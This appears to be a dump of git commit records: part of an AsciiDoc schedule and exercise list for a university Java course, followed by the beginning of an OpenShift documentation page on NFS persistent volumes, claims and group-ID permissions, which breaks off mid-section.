(TODO home)\n\n*Todo*\n\n* Install a https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Various.adoc#installing-the-jdk[JDK] from OpenJDK (11 or ulterior)\n* Install https:\/\/www.eclipse.org\/downloads\/packages\/[Eclipse IDE] \u201cfor Java Developers\u201d\n* Install https:\/\/git-scm.com\/download[git]\n* Redirect your e-mails @ Dauphine if necessary to ensure you receive announcements posted on MyCourse\n\n*Second half*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Ex%C3%A9cution\/presentation.pdf[Ex\u00e9cution]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.1] (machine language), 1.2 (Asynchronous events), 1.3 (JVM)\n* *Exercices* (TODO home):\n** Add a `main` method to your `MyBooleanClass` that prints \u201cHello, this is my boolean class.\u201d Use `System.out.println(\"\u2026\")` to print.\n** Add a `main` method to you `MyMathClass` that accepts two arguments that can each be either `\"true\"` or `\"false\"`; the method calls your `xor` method with the corresponding parameters and prints the result.\n** Compile `MyBooleanClass` with https:\/\/docs.oracle.com\/en\/java\/javase\/13\/docs\/specs\/man\/javac.html[javac], move the resulting file into its own folder, execute it from the source folder.\n** Find out _in the official documentation_ how to compile the class and let the resulting class be placed in its own folder, in a single step (without you having to move the file afterwards)\n** Compile `MyMathClass`, move the resulting file into its own folder (alone), and execute it from the source folder. Why does it fail? What does the error message indicate, and how is it related to the problem? Fix the problem and execute it, first by grouping the class files, second, while keeping both class files in different folders.\n** (link:http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.1] to 2.2, supposedly known)\n** http:\/\/math.hws.edu\/javanotes\/c1\/quiz.html[EQ1.3] to 1.9\n** http:\/\/math.hws.edu\/javanotes\/c2\/quiz.html[EQ2.1] to 2.4; 2.6 to 2.9; 2.11\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES1.5] (objects), 2.3.2 (classes and objects)\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.3] to 2.6*; use Scanner, not TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]*: use user input (Scanner) instead of file input; do not use TextIO\n** *http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3*\n** *EE3.4, 3.6 [I]*\n** EE3.8, 3.9 [O]\n\n[[S2]]\n=== S2 (28 Feb)\n\n* Supposed known: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git]; https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Shell.adoc[Shell]; Execution (see above).\n* Reminder: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Notions%20objets\/presentation.pdf[Basics of objects]\n** Two roles of classes; static VS instance methods (whose behavior depends on values of parameters and instance attributes)\n* Note about packages (for using `Scanner`)\n** Class has a short name and a package, hence, a long name. 
(And two file names!)\n* *Exercices* (TODO home):\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.2] to 2.6; use Scanner, not TextIO\n** http:\/\/math.hws.edu\/javanotes\/c2\/exercises.html[EE2.7]; use user input (Scanner) instead of file input; do not use TextIO\n** http:\/\/math.hws.edu\/javanotes\/c3\/exercises.html[EE3.1] to 3.3\n** EE3.4, 3.6 [I]\n* Eclipse & Java:\n** Use Outline view\n** Use Problems view\n** Use Javadoc view\n** Content completion with CTRL+Space\n** Organize imports: from an editor, select `Source` \/ `Organize Imports`\n** In the http:\/\/help.eclipse.org\/latest\/topic\/org.eclipse.jdt.doc.user\/gettingStarted\/qs-2.htm[Basic tutorial], read: Creating a Java Class; Renaming Java elements; Navigate to a Java element's declaration; Viewing the type Hierarchy; Running your programs\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven]: Introduction\n** Exercice: *Import a Maven project into Eclipse*\n\n[[S3]]\n=== S3 (4 March)\n\n* Graded exercice similar to https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Dep-Git.adoc[Dep-Git] and similar to the exercices related to https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/README.adoc[Git] in this course. Your GitHub username and git `user.name` must be identical (and for all exercices to come as well). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Git\/Git-Br.adoc[Git-Br] (8h32 to 8h52).\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Maven\/README.adoc[Maven], and *exercices* (TODO home: Modern project)\n* Two major principles of software engineering: https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Contrat\/presentation.pdf[contract] and fail-fast.\n** Mechanisms: interface; black box; preconditions and postconditions; javadoc; exceptions\n** http:\/\/math.hws.edu\/javanotes\/contents-with-subsections.html[ES3.7] Exceptions (except 3.7.3)\n** ES4 Subroutines, lambdas, packages, javadoc.\n** ES4.2.4 Member Variables [I]\n** ES4.3 intro to 4.3.2, 4.7.1 Preconditions and Postconditions [I]\n** Javadoc: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours3.pdf[Airiau C3], p. 12 to 19.\n** http:\/\/math.hws.edu\/javanotes\/c4\/quiz.html[EQ4]\n** https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Assert\/presentation.pdf[assertions] (advanced)\n** Illustration: ES4.7.2 A Design Example\n* Javadoc in Eclipse: `Source` \/ `Generate Element Comment` (on methods and classes!), use the `Javadoc` view\n* Append `throw IllegalArgumentException` (for example) on your method header when you want to raise attention to it, and document it in Javadoc\n* *Exercices:*\n** Comment several methods with Javadoc, including the exceptions\n** Find out how you can find, when your program crashes because of an exception, the exact place where the exception was raised and which call caused the crash\n** http:\/\/math.hws.edu\/javanotes\/c4\/exercises.html[EE4.1], 4.2\n** EE4.3, 4.4 [I] (TODO home)\n** EE4.7\n\n[[S4]]\n=== S4 (5 March)\n\n* Graded exercice using your knowledge from Shell; Execution; EE2.x; EE3.x (see above). See https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Ex\u00e9cution\/Print%20exec.adoc[Print exec]. 
(13h45 to 14h45)\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Objets\/presentation.pdf[Objets]\n** http:\/\/math.hws.edu\/javanotes\/c5\/[ES5] intro to 5.4\n* *Exercices:*\n** http:\/\/math.hws.edu\/javanotes\/c5\/exercises.html[EE5.1], 5.2\n** EE5.3 [I]\n\/\/ ** Supplementary requirement: you will archive `PairOfDice` and `StatCalc` into a JAR file and use this in a new Eclipse project where only one class is defined, which uses `PairOfDice` and `StatCalc`. Commit both projects into your repository (in two separate folders). The structure of your git repository should be as follows. Please follow the exact naming scheme.\n\/\/ ** `project43\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project47\/`\u2026 (contains `src` with your source code inside a sub-folder of it)\n\/\/ ** `project53utils\/`\u2026 (contains `utils.jar` and `src\/` with `PairOfDice` and `StatCalc` inside a sub-folder of it)\n\/\/ ** `project53main\/`\u2026 (contains `src\/` with you main method)\n\/\/* You may use the `groupId` `io.github.<yourgithubusername>`.\n** EE5.4, EE5.5: Play Blackjack!\n\n[[S5]]\n=== S5 (18 March)\n\n* Graded programming exercice\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/JUnit.adoc[Unit testing]\n* Inheritance: Object; print an object; more polymorphism.\n* Generics and https:\/\/www.scientecheasy.com\/2018\/09\/collection-hierarchy-in-java.html[collections].\n** For this course, use by default: `ArrayList` \/ `ImmutableList`; `LinkedHashSet` \/ `ImmutableSet`; `LinkedHashMap` \/ `ImmutableMap`.\n* Exceptions: checked and unchecked\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Search%20path\/README.adoc[Search path] (packages, classes and directories).\n* Java Interfaces and the Calculator example: replaceability and use as type\n\/\/* Exceptions in Java: http:\/\/www.lamsade.dauphine.fr\/~airiau\/Teaching\/L3-Java\/cours5.pdf[Airiau C5] (and see slides Contrat, appendix)\n\n* https:\/\/www.youtube.com\/watch?v=lcYkOh4nweE&t=1m21s[Mars Climate Orbiter] (1m21 to 5m18; small mistake in the video: it\u2019s Newton times second, not Newton force per second; see also https:\/\/en.wikipedia.org\/wiki\/Mars_Climate_Orbiter[Wikipedia]; similarly http:\/\/www-users.math.umn.edu\/~arnold\/disasters\/ariane.html[sad] https:\/\/www.youtube.com\/watch?v=gp_D8r-2hwk[story]{emptyattribute})\n\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/javanotes8\/c5\/[ES5.5] to 5.8\n* http:\/\/math.hws.edu\/javanotes8\/c10\/[ES10] to 10.2\n\/\/ simple inheritance (no TextIO depended on, actually), but complex set up\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.4] (use `Scanner` instead of `TextIO`)\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4] \n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (you may use standard input instead of file input)\n\/\/ set (long)\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/exercises.html[EE10.2]\n\n*Exercices*\n\n* Write an interface `Calculator` with a method `add` that takes two integers as parameters. Write a method `tester` in a different class that receives a calculator as a parameter and check that `add(2, 3)` gives 5. 
Write a `SimpleCalculator` that uses the normal Java addition (\u201c+\u201d) to implement `Calculator`.\n\/\/interfaces with generics\n* Implement a `Predicate<String>` to represent a function that associates to a String the value `true` iff its length is even.\n* Define a class `Pair<T1, T2>` to store an ordered pair of objects of type `T1` and `T2`.\n\/\/ implements but no inheritance\n* http:\/\/math.hws.edu\/javanotes8\/c5\/exercises.html[EE5.7] [I] (the part about anonymous classes is optional)\n\/\/** Supplementary requirements: your code must lie in at least two packages;\n\/\/** The idea of this exercice is that you simulate that three different people work on this exercice: one provides some interfaces; another implements the interfaces; a third one uses the interfaces and their implementations to solve the exercice (except you represent all these persons).\n\/\/** Declare at least one interface in another Eclipse project, exported as a Java archive (JAR file);\n\/\/** implement those interfaces in another Eclipse project, exported as a Java archive (JAR file) (will you need the previous JAR file? Why \/ why not?);\n\/\/** solve the exercices in a third Eclipse project (will you need the previous JAR files? Which ones and why?).\n\/\/ read, sort a list\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.1], 7.5 (except that you can use built-sorting functions from the Java API).\n* A class E1 that asks the end-user for a set of integer values. The user enters 0 to stop entering values. Store these values in a Set of Integer values (discarding duplicates). Do it again, obtaining a second set. Then print each set of values entered, then the union of both sets. For example, if the user enters 3, 4, 2, 0, then 1, 1, 2, 5, 0, it prints: 3, 4, 2, then 1, 2, 5, then 3, 4, 2, 1, 5. Use Java sets and interfaces appropriately. [I]\n\n*Todo*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#configuration[Tools]: use correct Eclipse config. (Check warnings, compile errors, instructions!)\n* Commit mandatory exercices https:\/\/classroom.github.com\/a\/X7DXDNfU[here].\n\n[[S6]]\n=== S6 (Wednesday 17th of April, 2019)\n\n*Lecture*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/Maven[Maven]\n* Use https:\/\/mvnrepository.com\/artifact\/com.google.guava\/guava\/27.1-jre[Guava] `https:\/\/github.com\/google\/guava\/wiki\/PreconditionsExplained[Preconditions]#checkArgument`\n* Overload `toString()`: use Guava https:\/\/guava.dev\/releases\/snapshot\/api\/docs\/com\/google\/common\/base\/MoreObjects.ToStringHelper.html[`MoreObjects`]\n* null (started)\n* Correct E1\n.. d\u00e9coup\u00e9 en sous-routines ?\n.. contrat g\u00e9n\u00e9ral (Collection au lieu de LinkedList) ?\n.. noms complets de classes uniques ?\n.. structures appropri\u00e9es ? (Set)\n.. r\u00e9utilisation si on demande les nombres diff\u00e9remment ? (Lus depuis fichiers)\n.. nommage appropri\u00e9 ? (searchNumber renvoie boolean, non, devrait poser une question: isIn)\n.. documentation javadoc lorsque n\u00e9cessaire ?\n.. utilisation ad\u00e9quate des structures ? (ne pas rechercher un nombre dans une liste)\n.. conventions respect\u00e9es ? (noms de variables et m\u00e9thodes en camelCase, de classes en PascalCase, de packages en minuscules, \u2026)\n.. m\u00e9thodes d\u2019instance (et pas statiques) ?\n.. pas de commentaires inutiles (tq auto-g\u00e9n\u00e9r\u00e9s \/\/TODO, @author vide, \u2026)\n.. 
\n\n*Todo*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#configuration[Tools]: use correct Eclipse config. (Check warnings, compile errors, instructions!)\n* Commit mandatory exercices https:\/\/classroom.github.com\/a\/X7DXDNfU[here].\n\n[[S6]]\n=== S6 (Wednesday 17th of April, 2019)\n\n*Lecture*\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/Maven[Maven]\n* Use https:\/\/mvnrepository.com\/artifact\/com.google.guava\/guava\/27.1-jre[Guava] `https:\/\/github.com\/google\/guava\/wiki\/PreconditionsExplained[Preconditions]#checkArgument`\n* Override `toString()`: use Guava https:\/\/guava.dev\/releases\/snapshot\/api\/docs\/com\/google\/common\/base\/MoreObjects.ToStringHelper.html[`MoreObjects`]\n* null (started)\n* Correct E1\n.. split into subroutines?\n.. general contract (Collection instead of LinkedList)?\n.. unique fully qualified class names?\n.. appropriate structures? (Set)\n.. reusable if the numbers are requested differently? (read from files)\n.. appropriate naming? (searchNumber returning a boolean should rather ask a question: isIn)\n.. javadoc documentation where necessary?\n.. adequate use of the structures? (do not search for a number in a list)\n.. conventions respected? (variable and method names in camelCase, class names in PascalCase, package names in lowercase, \u2026)\n.. instance methods (not static ones)?\n.. no useless comments (such as auto-generated \/\/TODO, empty @author, \u2026)\n.. (micro) no comparison to `true` (`if(isBig == true)`)\n.. check that you can see the result of your javadoc (for example, `@param truc of type String` is useless)\n* Maps, Comparable, Comparator (see also the Airiau slides)\n\n*Material and going beyond*\n\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c10\/[ES10.3] to 10.5\n* http:\/\/math.hws.edu\/eck\/cs124\/javanotes7\/c8\/[ES8] intro to 8.4\n\n*Exercices*\n\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.1]\n\/\/interfaces with generics and collections\n* http:\/\/math.hws.edu\/javanotes8\/c10\/exercises.html[EE10.4]\n\n[[S7]]\n=== S7 (Friday 19th of April, 2019)\n\n* No plagiarism (but reuse!)\n* Static factory method\n** A static method\n** Produces the type of the class it belongs to\n** Serves as a factory\n** Examples: `String.valueOf(true);`, `Integer.valueOf(3);`, `ImmutableList.of();`, `String.link:https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\/java.base\/java\/lang\/String.html#format(java.lang.String,java.lang.Object...)[format](\"Person name: %s, id: %d\", name, id);`\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/arguments.html[Varargs]\n* Files and https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Flows.adoc[flows]\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Resources.adoc[Resources]; exercice: read a file from the class path.\n* Primitive types (autoboxing); optional; give guarantees: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Best%20practices\/Null.adoc[Best practices]\n\n*Exercices*\n\n* Implement an interface `EasyMap` with two methods: a method that puts a pair of key and value of your choice into a map, and a method that returns an `Optional` containing the value corresponding to the given key (parameter of the method) or that returns an empty `Optional` if there is no such value. Implement this interface in a class `EasyMapImpl`. Provide a static factory method in the interface `EasyMap`. Minimize the number of lines of code (but not at the price of readability). Note that this exercice implements the https:\/\/en.wikipedia.org\/wiki\/Forwarding_(object-oriented_programming)[forwarding] pattern.\n** Define `MyComparator`, a class that implements a comparator over your values. Add a third method to `EasyMap` that returns a list of values ordered by that comparator.
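\n+\nA minimal sketch under one reading of these requirements (`String` keys and `Integer` values are an arbitrary choice, and the method names are illustrative); the forwarding pattern shows up in `EasyMapImpl`, which delegates to a wrapped map:\n+\n[source,java]\n----\nimport java.util.LinkedHashMap;\nimport java.util.Map;\nimport java.util.Optional;\n\ninterface EasyMap {\n static EasyMap newInstance() {\n return new EasyMapImpl();\n }\n\n void put(String key, Integer value);\n\n Optional<Integer> get(String key);\n}\n\nclass EasyMapImpl implements EasyMap {\n private final Map<String, Integer> delegate = new LinkedHashMap<>();\n\n @Override\n public void put(String key, Integer value) {\n \/\/ forwards to the wrapped map\n delegate.put(key, value);\n }\n\n @Override\n public Optional<Integer> get(String key) {\n return Optional.ofNullable(delegate.get(key));\n }\n}\n----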
\n\/\/ list of words\n* http:\/\/math.hws.edu\/javanotes8\/c7\/exercises.html[EE7.6] (do not use the provided method: split words at space character; use standard file IO instead of TextIO)\n\n*Todo*\n\n* Read https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Tools.adoc#eclipse[Eclipse] doc (or equivalent for your IDE of choice)\n* Make sure you can see, through your IDE, the javadoc of the JDK and of the libraries you add through Maven, so that you can code efficiently\n* If you use an IDE different from Eclipse, you are supposed to adjust your parameters to match the configuration provided for Eclipse (see Tools.adoc).\n\n[[S8]]\n=== S8 (Monday 6th of May, 2019)\n\n* Questions?\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Extractor.adoc[exercice]\n** Submitted code must be clean: well-formatted, clear, well named, \u2026\n** Must compile using Maven (otherwise, no point awarded)\n** No warning given by Eclipse\n** 15h44 to 16h24\n* Choose your https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Projets.adoc[project]\n* Comparing Persons, revisited, using https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Lambda Expressions]\n* Override `equals` and `hashCode`\n\n[[S9]]\n=== S9 (Friday 10th of May, 2019)\n\n* Tentative coefficients: graded quiz: 0.5, Extractor: 0.5, next graded exercices: 1, last graded exercice: 2\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/DevOps\/CI.adoc[CI]: Travis\n* TODO: delivery 1 before the end of the day preceding S10.\n\n[[S10]]\n=== S10 (Monday 20th of May, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/Dep-Git.adoc[exercice] (about Maven dependencies and Git)\n* https:\/\/stackoverflow.com\/questions\/28972893\/what-is-exception-wrapping-in-java[Wrapping] exceptions\n* https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Log\/README.adoc[Logging]\n* https:\/\/github.com\/oliviercailloux\/java-course\/raw\/master\/Annotations\/presentation.pdf[Annotations]\n\n[[S11]]\n=== S11 (Thursday 23rd of May, 2019)\n\n* https:\/\/github.com\/oliviercailloux\/java-course\/tree\/master\/SWT[SWT]\n\n[[S12]]\n=== S12 (Friday 24th of May, 2019)\n\n* Back to https:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/lambdaexpressions.html[Method references]\n* TODO: next delivery before the end of the day preceding the next session.\n\n[[S13]]\n=== S13 (Tuesday 4th of June, 2019)\n\n* Graded https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/Divers\/JUnit.adoc[exercice]: unit tests \/ access resources through class path \/ continue Extractor.\n** 17h17 to 17h42 (5 min for delays due to GitHub)\n\n* Write the list of PRs for Iteration 2 for each sub-team in `README.adoc` in your `dev` branch.\n\n[[S14]]\n=== S14 (Wednesday 5th of June, 2019)\n\n* Licenses and philosophy: https:\/\/www.gnu.org\/philosophy\/philosophy.html[GNU]; https:\/\/opensource.org\/[OSI]; Copyleft (GNU https:\/\/opensource.org\/licenses\/GPL-3.0[GPL]); Non-copyleft (https:\/\/opensource.org\/licenses\/MIT[MIT])\n* Parsing HTML: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/HTML%20to%20DOM.adoc[DOM]\n* Accessing REST web services: https:\/\/github.com\/oliviercailloux\/java-course\/blob\/master\/WS%20client\/JAX-RS%20client.adoc[JAX-RS client]\n\n[[S15]]\n=== S15 (Monday 17th of June, 2019)\n\n* Work on 
project\n* TODO: delivery 3 before the end of Thursday the 20th, with PRs assigned to a Milestone \u00ab\u202fIt\u00e9ration 3\u202f\u00bb (thanks to the Assisted Board Games team for this tip).\n\n[[S16]]\n=== S16 (Friday 21st of June, 2019)\n\n* Work on project\n* TODO: delivery 4 before the end of Friday the 28th, with PRs assigned to a Milestone \u00ab\u202fIt\u00e9ration 4\u202f\u00bb.\n** Optional: a task that adds to your README elements that you would like me to take into account in my overall evaluation (difficulties met, work I may have forgotten to evaluate in a previous iteration, \u2026). Back up your claims with verifiable elements (commits, documents, \u2026).\n** Submission allowed until the end of Saturday the 29th if necessary, but a bonus will be granted for a submission on Friday evening.\n* Presentation before the end of Sunday the 30th, directly on the master branch, in `Doc\/Pr\u00e9sentation 2019.pdf`.\n\n[[S17]]\n=== S17 (Monday 1st of July, 2019)\n\n* Presentations: \nhttps:\/\/github.com\/13tomoore\/J-Confs\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Confs], \nhttps:\/\/github.com\/Amioplk\/Apartments\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Apartments], \nhttps:\/\/github.com\/CHARLONCyril\/2D-Library\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[2D Library], \nhttps:\/\/github.com\/busychess\/Assisted-Board-Games\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[Assisted Board Games], \nhttps:\/\/github.com\/j-voting\/J-Voting\/raw\/master\/Doc\/Pr%C3%A9sentation%202019.pdf[J-Voting]\n** Code & slides on the presentation computer\n** 15 to 30 minutes\n** Graded: interest for the audience; the audience's understanding of the context and of the goal of the project; the audience's understanding of the code architecture and of the technical aspects; clear distinction between the functions already present VS those added; possible originality & creativity; \u2026\n* Votes\n* Evals, and https:\/\/github.com\/oliviercailloux\/projets\/blob\/master\/Licences\/Licence.adoc[Licences]: https:\/\/github.com\/oliviercailloux\/projets\/raw\/master\/Licences\/Declaration%20of%20licensing.odt[Decl]\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b173ee7bb78405c83efdeb9ab84ff0be82c1c898","subject":"Fix 'supplemental' typo","message":"Fix 'supplemental' typo\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/persistent_storage\/persistent_storage_nfs.adoc","new_file":"install_config\/persistent_storage\/persistent_storage_nfs.adoc","new_contents":"= Persistent Storage Using NFS\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nOpenShift clusters can be provisioned with\nlink:..\/..\/architecture\/additional_concepts\/storage.html[persistent storage]\nusing NFS. Persistent volumes (PVs) and persistent volume claims (PVCs) provide\na convenient method for sharing a volume across a project. 
While the\nNFS-specific information contained in a PV definition could also be defined\ndirectly in a pod definition, doing so does not create the volume as a distinct\ncluster resource, making the volume more susceptible to conflicts.\n\nThis topic covers the specifics of using the NFS persistent storage type. Some\nfamiliarity with OpenShift and\nhttps:\/\/access.redhat.com\/documentation\/en-US\/Red_Hat_Enterprise_Linux\/7\/html\/Storage_Administration_Guide\/ch-nfs.html[NFS]\nis beneficial. See the\nlink:..\/..\/architecture\/additional_concepts\/storage.html[Persistent Storage]\nconcept topic for details on the OpenShift persistent volume (PV) framework in\ngeneral.\n\n[[nfs-provisioning]]\n== Provisioning\n\nStorage must exist in the underlying infrastructure before it can be mounted as\na volume in OpenShift. To provision NFS volumes, a list of NFS servers and\nexport paths is all that is required.\n\nYou must first create an object definition for the PV:\n\n.PV Object Definition Using NFS\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Recycle <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume, it is\nactually used similarly to labels and used to match a PVC to a PV. Currently, no\naccess rules are enforced based on the `*accessModes*`.\n<4> The volume type being used, in this case the *nfs* plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume when released\nfrom its claim. Valid options are *Retain* (default) and *Recycle*. See\nlink:#nfs-reclaiming-resources[Reclaiming Resources].\n====\n\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n\nSave the definition to a file, for example *_nfs-pv.yaml_*, and create the PV:\n\n====\n----\n$ oc create -f nfs-pv.yaml\npersistentvolume \"pv0001\" created\n----\n====\n\nVerify that the PV was created:\n\n====\n----\n# oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n====\n\nThe next step can be to create a persistent volume claim (PVC) which will bind\nto the new PV:\n\n.PVC Object Definition\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 1Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim will look for PVs offering *1Gi* or greater capacity.\n====\n\nSave the definition to a file, for example *_nfs-claim.yaml_*, and create the\nPVC:\n\n====\n----\n# oc create -f nfs-claim.yaml\n----\n====\n\n[[nfs-enforcing-disk-quotas]]\n== Enforcing Disk Quotas\n\nYou can use disk partitions to enforce disk quotas and size constraints. Each\npartition can be its own export. Each export is one PV. OpenShift enforces\nunique names for PVs, but the uniqueness of the NFS volume's server and path is\nup to the administrator.\n\nEnforcing quotas in this way allows the developer to request persistent storage\nby a specific amount (for example, 10Gi) and be matched with a corresponding\nvolume of equal or greater capacity.\n\n[[nfs-volume-security]]\n== Volume Security\n\nThis section covers NFS volume security, including matching permissions and\nSELinux considerations. The reader is expected to understand the basics of POSIX\npermissions, process UIDs, supplemental groups, and SELinux.\n\n[NOTE]\n====\nSee the full\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[Volume\nSecurity] topic before implementing NFS volumes.\n====\n\nDevelopers request NFS storage by referencing, in the `*volumes*` section of\ntheir pod definition, either a PVC by name or the NFS volume plug-in directly.
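\n\nFor example, a pod can reference the PVC created above by name in its `*volumes*` section (the pod, container, and volume names in this sketch are illustrative only, and the image is an arbitrary choice):\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\nmetadata:\n name: nfs-pod\nspec:\n containers:\n - name: app\n image: busybox\n volumeMounts:\n - name: nfs-volume\n mountPath: \/mnt\/nfs\n volumes:\n - name: nfs-volume\n persistentVolumeClaim:\n claimName: nfs-claim1 # the PVC created above\n----\n====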
\n\nThe *_\/etc\/exports_* file on the NFS server contains the accessible NFS\ndirectories. The target NFS directory has POSIX owner and group IDs. The\nOpenShift NFS plug-in mounts the container's NFS directory with the same POSIX\nownership and permissions found on the exported NFS directory. However, the\ncontainer is not run with its effective UID equal to the owner of the NFS mount,\nwhich is the desired behavior.\n\nAs an example, if the target NFS directory appears on the NFS server as:\n\n[[nfs-export]]\n====\n----\n# ls -lZ \/opt\/nfs -d\ndrwxrws---. nfsnobody 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n\n# id nfsnobody\nuid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)\n----\n====\n\nThen the container must match SELinux labels, and either run with a UID of\n*65534* (*nfsnobody* owner) or with *5555* in its supplemental groups in order\nto access the directory.\n\n[NOTE]\n====\nThe owner ID of 65534 is used as an example. Even though NFS's *root_squash*\nmaps *root* (0) to *nfsnobody* (65534), NFS exports can have arbitrary owner\nIDs. Owner 65534 is not required for NFS exports.\n====\n\n[[nfs-supplemental-groups]]\n=== Group IDs\n\nThe recommended way to handle NFS access (assuming it is not an option to change\npermissions on the NFS export) is to use supplemental groups. Supplemental\ngroups in OpenShift are used for shared storage, of which NFS is an example. In\ncontrast, block storage, such as Ceph RBD or iSCSI, uses the *fsGroup* SCC\nstrategy and the *fsGroup* value in the pod's `*securityContext*`.\n\n[NOTE]\n====\nIt is generally preferable to use supplemental group IDs to gain access to\npersistent storage versus using link:#nfs-user-ids[user IDs]. Supplemental\ngroups are covered further in the full\nlink:pod_security_context.html#supplemental-groups[Volume Security] topic.\n====\n\nBecause the group ID on the link:#nfs-export[example target NFS directory] shown\nabove is 5555, the pod can define that group ID using `*supplementalGroups*`\nunder the pod-level `*securityContext*` definition. For example:\n\n====\n----\nspec:\n containers:\n - name:\n ...\n securityContext: <1>\n supplementalGroups: [5555] <2>\n----\n<1> `*securityContext*` must be defined at the pod level, not under a specific container.\n<2> An array of GIDs defined for the pod. In this case, there is one element in the array;\nadditional GIDs would be comma-separated.\n====\n\nAssuming there are no custom SCCs that might satisfy the pod's requirements, the\npod will likely match the *restricted* SCC. 
